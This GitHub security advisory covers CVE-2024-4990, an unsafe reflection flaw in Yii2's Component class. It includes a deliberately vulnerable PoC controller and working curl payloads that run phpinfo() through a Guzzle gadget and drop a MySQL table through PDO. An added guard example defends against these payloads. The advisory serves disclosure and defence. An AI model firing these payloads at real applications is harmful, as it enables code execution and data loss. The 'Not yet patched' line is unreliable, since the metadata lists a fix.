ghsa-cjcc-p67m-7qxm
Vulnerability from github
Published: 2024-06-02 22:30
Modified: 2025-04-01 23:13
Summary
Unsafe Reflection in base Component class in yiisoft/yii2
Details

Yii2 supports attaching Behaviors to Components by setting properties whose name has the format 'as <behaviour-name>'.

Internally this is done using the __set() magic method. If the value passed to this method is not an instance of the Behavior class, a new object is instantiated using Yii::createObject($value). However, there is no validation check verifying that $value is a valid Behavior class name or configuration. An attacker who can control the content of the $value variable can therefore instantiate arbitrary classes, pass parameters to their constructors and have their setter methods invoked.

Impact

With some effort, malicious code can be injected and executed; the effect could be anything from deleting files to dropping database tables.

Patches

Not yet patched.

Workarounds

No workaround available.

References

Reported here: https://huntr.com/bounties/4fbdd965-02b6-42e4-b57b-f98f93415b8f

In case the link is dead, here is the full description:

Description

Yii2 supports attaching Behaviors to Components by setting properties whose name has the format 'as <behaviour-name>'.

Internally this is done using the __set() magic method. If the value passed to this method is not an instance of the Behavior class, a new object is instantiated using Yii::createObject($value). However, there is no validation check verifying that $value is a valid Behavior class name or configuration. An attacker who can control the content of the $value variable can therefore instantiate arbitrary classes, pass parameters to their constructors and have their setter methods invoked.

Depending on the installed dependencies, various kinds of attacks are possible.

Proof of Concept

A PoC application was created using composer create-project, as specified in the getting started guide (https://www.yiiframework.com/doc/guide/2.0/en/start-installation).

Yii JSON parser was enabled in the configuration:

```php
'parsers' => [
    'application/json' => 'yii\web\JsonParser',
],
```

A vulnerable controller was added:

```php
<?php

namespace app\controllers;

use yii\base\Component;
use yii\web\Controller;

class ExploitableController extends Controller
{
    public function beforeAction($action): bool
    {
        // Needed only to simplify the PoC
        $this->enableCsrfValidation = false;
        return parent::beforeAction($action);
    }

    public function actionVulnerable(): string
    {
        $fields = $this->request->post();
        $myComponent = new Component();
        // Every posted key, including one named 'as <name>', reaches Component::__set()
        foreach ($fields as $key => $value) {
            $myComponent->$key = $value;
        }
        return "";
    }
}
```

Executing phpinfo()

The following command stores the content of phpinfo() inside info.html:

```bash
curl -XPOST -H "Content-Type: application/json" -d '{"as hack": {"__class":"GuzzleHttp\\Psr7\\FnStream", "__construct()": [[]], "_fn_close": "phpinfo"}}' http://localhost:8080/index.php?r=exploitable%2Fvulnerable > info.html
```

It leverages the fact that the GuzzleHttp\Psr7\FnStream class executes call_user_func($this->_fn_close) inside __destruct(). This class is a default dependency.

Executing arbitrary MySQL queries (blind execution)

If the application is connected to a MySQL database, it is possible to abuse the PDO class to execute arbitrary SQL queries:

```bash
curl -XPOST -H "Content-Type: application/json" -d '{"as hack": {"__class":"\\PDO", "__construct()": ["mysql:host=127.0.0.1;dbname=test", "test", "test", {"1002": "DROP TABLE test"}]}}' http://localhost:8080/index.php?r=exploitable%2Fvulnerable
```

Notice that the server will always return a 500 Internal Server Error (because the instantiated class is not a Behavior); however, the query is executed, even though we cannot receive any output from it. If the query fails we might see a PDO error message (e.g. "Table 'test.foo' doesn't exist"), depending on the app configuration.

Impact

It is not trivial to exploit this bug, because it depends on peculiar characteristics of the target application. However, it appears that there is at least one very popular product built on Yii2 that is severely affected by this vulnerability (allowing an anonymous user to gain admin access with an easy exploit).

The consequences of the exploitation could vary from retrieving sensitive information to DoS or unauthorized access.
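An added example, not part of this advisory and not yiisoft/yii2's own fix, showing the kind of check that __set() needs before handing an 'as <name>' value to Yii::createObject(): it rejects both PoC payload shapes above and accepts only Behavior instances, Behavior subclass names, or config arrays naming a Behavior subclass. The Behavior, AuditBehavior and FnStream classes are stand-ins (assumptions) so the file runs without Yii; in a real application $base would be yii\base\Behavior::class.

```php
<?php
// Added example, not yiisoft/yii2's own code: a guard for the value that
// Component::__set() receives for an "as <name>" property before it reaches
// Yii::createObject(). Only a Behavior instance, a Behavior subclass name, or
// a config array whose 'class'/'__class' names a Behavior subclass passes.
// The classes below are stand-ins so this runs without Yii installed.

class Behavior {}                       // stand-in for yii\base\Behavior
class AuditBehavior extends Behavior {} // a legitimate behavior
class FnStream {}                       // stand-in for GuzzleHttp\Psr7\FnStream

// Class name a behavior config would instantiate, or null if the shape is not accepted.
function behaviorClassOf($value): ?string
{
    if (is_string($value)) {
        return $value;
    }
    if (is_array($value)) {
        // createObject() honours both 'class' and '__class'; the PoC payloads
        // above use '__class', so both keys must be checked.
        foreach (['class', '__class'] as $key) {
            if (isset($value[$key]) && is_string($value[$key])) {
                return $value[$key];
            }
        }
    }
    return null;
}

// True only if $value may be handed to createObject() as a behavior.
function isSafeBehaviorConfig($value, string $base = Behavior::class): bool
{
    if ($value instanceof $base) {
        return true;
    }
    $class = behaviorClassOf($value);
    // is_subclass_of() with autoload also rejects classes that do not exist.
    return $class !== null && is_subclass_of($class, $base, true);
}

// Constructed inputs: two legitimate shapes and the two PoC shapes from above.
$cases = [
    'string'   => AuditBehavior::class,
    'config'   => ['class' => AuditBehavior::class, 'enabled' => true],
    'fnstream' => ['__class' => FnStream::class, '__construct()' => [[]], '_fn_close' => 'phpinfo'],
    'pdo'      => ['__class' => '\\PDO', '__construct()' => ['mysql:host=127.0.0.1;dbname=test']],
];
foreach ($cases as $label => $cfg) {
    printf("%-8s %s\n", $label, isSafeBehaviorConfig($cfg) ? 'attach' : 'reject');
}
```

The first two cases print "attach" and the two PoC shapes print "reject"; the check runs before any object is constructed, so no constructor or destructor of the rejected class is ever reached.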

Occurrences

Component.php L191: https://github.com/yiisoft/yii2/blob/2.0.48/framework/base/Component.php#L191



{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "yiisoft/yii2"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.0.49.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-4990"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-470"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-06-02T22:30:39Z",
    "nvd_published_at": "2025-03-20T10:15:32Z",
    "severity": "HIGH"
  },
  "id": "GHSA-cjcc-p67m-7qxm",
  "modified": "2025-04-01T23:13:58Z",
  "published": "2024-06-02T22:30:39Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/yiisoft/yii2/security/advisories/GHSA-cjcc-p67m-7qxm"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-4990"
    },
    {
      "type": "WEB",
      "url": "https://github.com/yiisoft/yii2/pull/20183"
    },
    {
      "type": "WEB",
      "url": "https://github.com/yiisoft/yii2/commit/628d406bfafb80fc32147837888c0057d89a021e"
    },
    {
      "type": "WEB",
      "url": "https://github.com/yiisoft/yii2/commit/62d081f18c3602d09e7d075bba3a0ca5c313f0b4"
    },
    {
      "type": "WEB",
      "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/yiisoft/yii2/CVE-2024-4990.yaml"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/yiisoft/yii2"
    },
    {
      "type": "WEB",
      "url": "https://github.com/yiisoft/yii2/blob/master/framework/CHANGELOG.md#2050-may-30-2024"
    },
    {
      "type": "WEB",
      "url": "https://huntr.com/bounties/4fbdd965-02b6-42e4-b57b-f98f93415b8f"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Unsafe Reflection in base Component class in yiisoft/yii2"
}
